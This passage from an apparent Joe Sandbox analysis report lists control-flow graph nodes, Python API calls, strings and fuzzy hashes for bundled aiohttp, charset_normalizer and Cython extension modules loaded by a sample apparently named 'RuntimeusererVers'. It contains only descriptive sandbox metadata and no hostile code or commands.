11154->11156 11160 7ff81ecb14de 11154->11160 11157 7ff81ecb14f5 11156->11157 11158 7ff81ecb14dc 11156->11158 11159 7ff81ecb150e PyImport_ImportModule 11158->11159 11161 7ff81ecb1543 PyErr_Clear 11159->11161 11162 7ff81ecb1520 11159->11162 11160->11157 11160->11159 11163 7ff81ecb1505 _Py_Dealloc 11160->11163 11161->11155 11162->11161 11164 7ff81ecb152d 11162->11164 11163->11159 11164->11155 11165 7ff81ecb1533 _Py_Dealloc 11164->11165 14186 7ff81ecb6390 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14187 7ff81def24b0 14188 7ff81def24ed 14187->14188 14195 7ff81def24e4 14187->14195 14189 7ff81def272d 14188->14189 14197 7ff81def2544 14188->14197 14190 7ff81deea870 memset 14189->14190 14193 7ff81def2723 14190->14193 14191 7ff81df4ebe0 6 API calls 14192 7ff81def27e9 14191->14192 14200 7ff81def1540 14193->14200 14195->14191 14198 7ff81deea870 memset 14197->14198 14199 7ff81deea8cb 14198->14199 14199->14193 14201 7ff81def1760 14200->14201 14202 7ff81def1592 14200->14202 14224 7ff81deec550 14201->14224 14202->14201 14207 7ff81def15dd 14202->14207 14204 7ff81def16bd 14218 7ff81deecde0 14204->14218 14206 7ff81def16b8 14206->14195 14207->14204 14208 7ff81def161a 14207->14208 14210 7ff81deed0e0 14208->14210 14211 7ff81deec550 4 API calls 14210->14211 14214 7ff81deed151 14211->14214 14212 7ff81deed2e6 14212->14206 14213 7ff81deed231 memset 14216 7ff81deed276 memmove 14213->14216 14217 7ff81deed26f 14213->14217 14214->14212 14214->14213 14215 7ff81deed20d memmove 14214->14215 14215->14213 14216->14212 14217->14216 14219 7ff81deece1e 14218->14219 14220 7ff81deec550 4 API calls 14219->14220 14223 7ff81deecf59 14220->14223 14221 7ff81deecfdb 14221->14206 14222 7ff81deecfa9 memmove 14222->14221 14223->14221 14223->14222 14226 7ff81deec61e 14224->14226 14225 7ff81deecd2a 14225->14206 14226->14225 14227 7ff81deec8ea 14226->14227 14229 7ff81deec8f3 free 14226->14229 14230 7ff81deec916 14226->14230 14228 7ff81deec922 malloc 14227->14228 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
• Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
Similarity
• API ID: Err_$DeallocImportImport_Module$ClearUnraisableWarnWrite
• String ID: Cython module failed to register with collections.abc module$backports_abc$collections.abc
• API String ID: 3055409517-3167216013
• Opcode ID: dba47703814b50345f0bfb40dbc3bdb52dd412e8dda9eaddcbaec9fe2cb75489
• Instruction ID: 2c2ddac597505d59f8f3e83e47511694f51ac4316d8a56832fb2d874c7461a96
• Opcode Fuzzy Hash: dba47703814b50345f0bfb40dbc3bdb52dd412e8dda9eaddcbaec9fe2cb75489
• Instruction Fuzzy Hash: 8011E620E29E0381EF559B62AC582B622D0AF84BF5F480334D90F463A0EE7DF7898710

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Import$Capsule_DeallocImport_Module
                                                                                                                                                                                                                                          • String ID: charset_normalizer.md__mypyc$charset_normalizer.md__mypyc.init_charset_normalizer___md
                                                                                                                                                                                                                                          • API String ID: 1394619730-824592145

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_S_snprintfStringTuple_Version
                                                                                                                                                                                                                                          • String ID: %d.%d$Module '_websocket' has already been imported. Re-initialisation is not supported.$__builtins__$aiohttp._websocket$bool$builtins$compiletime version %s of module '%.100s' does not match runtime version %s$complex$cython_runtime$init aiohttp._websocket$name '%U' is not defined$type
                                                                                                                                                                                                                                          • API String ID: 2595704531-1331746022

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_String$Item$Dealloc$FromLongLong_$Err_Object_SizeUnicode_$AttrCallCode_EmptyFetchRestoreTuple_
                                                                                                                                                                                                                                          • String ID: co_argcount$co_cellvars$co_code$co_consts$co_flags$co_freevars$co_kwonlyargcount$co_linetable$co_names$co_nlocals$co_posonlyargcount$co_stacksize$co_varnames$replace
                                                                                                                                                                                                                                          • API String ID: 1955960856-725626598
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
• Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmp
• Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmp
• Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmp
• Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: 39c032ac710924fa7783a0340ae9420989a28a62c06058e897b4d705c1daebf8
                                                                                                                                                                                                                                          • Instruction ID: 7bf4b94a250b1479f7e0d29fe6aaf705f4378486b584241d497132c7a969f25c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c032ac710924fa7783a0340ae9420989a28a62c06058e897b4d705c1daebf8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46316D72719F8585EB608F64E8543ED73A0FB94794F404139DA4E47B98DF38E648C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638905947.00007FF81EC71000.00000020.00000001.01000000.0000006E.sdmp, Offset: 00007FF81EC70000, based on PE: true
• Associated: 0000003A.00000002.1638872780.00007FF81EC70000.00000002.00000001.01000000.0000006E.sdmp
• Associated: 0000003A.00000002.1638949902.00007FF81EC72000.00000002.00000001.01000000.0000006E.sdmp
• Associated: 0000003A.00000002.1639016964.00007FF81EC73000.00000004.00000001.01000000.0000006E.sdmp
• Associated: 0000003A.00000002.1639056414.00007FF81EC74000.00000002.00000001.01000000.0000006E.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: 7af6d3e7f7e34c059537e11f5101d55855401e4335d46a65a440c931bdec65b4
                                                                                                                                                                                                                                          • Instruction ID: 6e370d77694b1d53188ac4b8674637ae6faf9956e24583a9f66ca47210894704
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af6d3e7f7e34c059537e11f5101d55855401e4335d46a65a440c931bdec65b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64313072A19F8189EB649F60E8803ED73A2FB84794F444539DA8E87B94DF3CE548C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
• Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 313767242-0
                                                                                                                                                                                                                                          • Opcode ID: f18bf372630c86763d454d088a2fed133c01a6f09859efe0fe258df821aca2f5
                                                                                                                                                                                                                                          • Instruction ID: 02c35391761fa5618f9fbbdcbc1e104271853fa3fb3d47bdcf156876286c9e20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f18bf372630c86763d454d088a2fed133c01a6f09859efe0fe258df821aca2f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82314C72619E8186EB608F64E950BEE7360FB84794F44453ADA4E47B94EF3CE648C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
• Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$freemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2494952999-0
                                                                                                                                                                                                                                          • Opcode ID: 11ef85e6d1bcdfe93a5dc190668c770f62103d5e628ac0dc4676b0c4619323c5
                                                                                                                                                                                                                                          • Instruction ID: 366a2d8b5bb215a0359171033098131fb6aff231d0b64731b29152ec616bab9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11ef85e6d1bcdfe93a5dc190668c770f62103d5e628ac0dc4676b0c4619323c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45328E33A05F8186E754CF25D5407AA33A4FB58BA8F088339DB5D0B795EF39A1A4C720

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
• Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Err_$Dealloc$AttrObject_$ClearDict_ExceptionItemMatches$Module_State_$DictInterpreterObjectThread
                                                                                                                                                                                                                                          • String ID: Interpreter change detected - this module can only be loaded into one interpreter per process.$__file__$__loader__$__package__$__path__$loader$name$origin$parent$submodule_search_locations
                                                                                                                                                                                                                                          • API String ID: 3851358283-2188512448
                                                                                                                                                                                                                                          • Opcode ID: edf545a8bd909d813673eacdee54f790ed7a13a4044ada9ee02670b7bac46855
                                                                                                                                                                                                                                          • Instruction ID: 2d961bbb615d829ad85d14f2c89efc49dc0b743ce5c7486a169e6dff0801065f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edf545a8bd909d813673eacdee54f790ed7a13a4044ada9ee02670b7bac46855
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB71E721A29E4381EB558F26EE549B9A3E0BF85BF5B095339CD1E473A4EF2DF4548300

                                                                                                                                                                                                                                          Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
• Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
Similarity
• API ID: Dealloc$Err_$Object_$FetchMem_RestoreUnicode_$AttrBack_ClearCode_DictDict_EmptyFormatFrame_FromHashHereItem_KnownMallocReallocState_ThreadTrace
• String ID: %s (%s:%d)$aiohttp/_websocket.c
• API String ID: 1693070688-3693723348
• Opcode ID: 7f127098a0996deedaa68888af9cbb0043e995f9c4181e27990d48dd31f065a1
• Instruction ID: afb329ae19271f6b5dca43b4b95b53c9b30439398b2cfe5a616c9646566fb631
• Opcode Fuzzy Hash: 7f127098a0996deedaa68888af9cbb0043e995f9c4181e27990d48dd31f065a1
• Instruction Fuzzy Hash: 7EC12621A29E5281EB688F15AE489B8A3A6FF94FF4F094239D94E07764DF3CF4518300

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
• Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmp
• Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmp
• Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmp
• Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
Similarity
• API ID: Err_Eval_ThreadThread_acquire_lock_timedTime_$CallsDeadline_FromMakeMicrosecondsModuleNoneObjectPendingRestoreSaveSecondsStringThread_release_lockType_
• String ID: 'timeout' must be a non-negative number$timeout value is too large
• API String ID: 1143863106-4256478105
• Opcode ID: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
• Instruction ID: 73dc60ac93eaaa31b34e60680b41ae1dfd7efd0c1e748a41eb6ca50f95102a7c
• Opcode Fuzzy Hash: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
• Instruction Fuzzy Hash: AF510C25B28E1A92EB159B26EC5413A22A1FFA8FF0F404631EE5F47B94DF2CF4558740

Control-flow Graph
APIs
• PyErr_GetExcInfo.PYTHON311 ref: 00007FF81ECA282F
• PyErr_ExceptionMatches.PYTHON311 ref: 00007FF81ECA286C
• PyErr_SetExcInfo.PYTHON311 ref: 00007FF81ECA28CF
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA28E3
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA28F7
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA290B
  • Part of subcall function 00007FF81ECAF590: PyThreadState_Get.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5B7
  • Part of subcall function 00007FF81ECAF590: PyErr_Fetch.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5E8
  • Part of subcall function 00007FF81ECAF590: _PyObject_GetDictPtr.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5F5
  • Part of subcall function 00007FF81ECAF590: PyObject_Not.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF6C2
  • Part of subcall function 00007FF81ECAF590: PyErr_Restore.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF702
  • Part of subcall function 00007FF81ECAF590: PyFrame_New.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF95D
  • Part of subcall function 00007FF81ECAF590: PyTraceBack_Here.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF972
  • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF986
  • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF99A
  • Part of subcall function 00007FF81ECAEB20: PyErr_Fetch.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB47
  • Part of subcall function 00007FF81ECAEB20: PyErr_NormalizeException.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB5C
  • Part of subcall function 00007FF81ECAEB20: PyErr_Occurred.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB62
  • Part of subcall function 00007FF81ECAEB20: PyException_SetTraceback.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEB83
  • Part of subcall function 00007FF81ECAEB20: PyErr_SetExcInfo.PYTHON311(?,?,?,?,00000273,00007FF81EC9F8F8), ref: 00007FF81ECAEBDB
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2941
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2958
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2967
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2977
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA2986
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA299C
• PyErr_SetExcInfo.PYTHON311 ref: 00007FF81ECA29AE
• _Py_Dealloc.PYTHON311 ref: 00007FF81ECA29DB
Strings
Memory Dump Source
• Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
• Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmp
• Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
Similarity
• API ID: Dealloc$Err_$Info$ExceptionFetchObject_$Back_DictException_Frame_HereMatchesNormalizeOccurredRestoreState_ThreadTraceTraceback
• String ID: aiohttp._http_parser.cb_on_message_complete
• API String ID: 2151518968-1230838135
• Opcode ID: bc54ca10f449a21608673cb3d55c93d6088ca25345fa2540dafe11702f722f75
• Instruction ID: c3d4b7bac5b41cc64b4a37ec61ac8321ebfb08fd70e9e1b4dc569415c0af7a0c
• Opcode Fuzzy Hash: bc54ca10f449a21608673cb3d55c93d6088ca25345fa2540dafe11702f722f75
• Instruction Fuzzy Hash: A6510536A28F6285EB658F71EC441A967A4FB89FF8B080635EE4E13754DF3DE5858300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_NoneObject_Size
                                                                                                                                                                                                                                          • String ID: Expected %.16s, got %.200s$aiohttp._websocket._websocket_mask_cython$bytearray
                                                                                                                                                                                                                                          • API String ID: 2431445522-216305604
                                                                                                                                                                                                                                          • Opcode ID: 404dfbd97eb19e2a84dec710d42d2d46cdfe778bffa8fadc5a1f285570af02a4
                                                                                                                                                                                                                                          • Instruction ID: 80aba86c4fcb65ec25fd9f3546fdad6cf9d94a3ce2ce81f73db53068261aa842
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 404dfbd97eb19e2a84dec710d42d2d46cdfe778bffa8fadc5a1f285570af02a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D716B35E28E4685EB148B22EE40A7963E1FB95BF4F55433ACA5E07B94DF2CF4458700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyType_IsSubtype.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC8255A
                                                                                                                                                                                                                                          • Py_EnterRecursiveCall.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC8258D
                                                                                                                                                                                                                                          • Py_LeaveRecursiveCall.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825A3
                                                                                                                                                                                                                                          • PyErr_Occurred.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825AE
                                                                                                                                                                                                                                          • PyErr_SetString.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825CA
                                                                                                                                                                                                                                          • PyTuple_New.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC825DF
                                                                                                                                                                                                                                          • PyObject_Call.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC82615
                                                                                                                                                                                                                                          • Py_EnterRecursiveCall.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC82627
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,00007FF81EC8160A), ref: 00007FF81EC82679
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
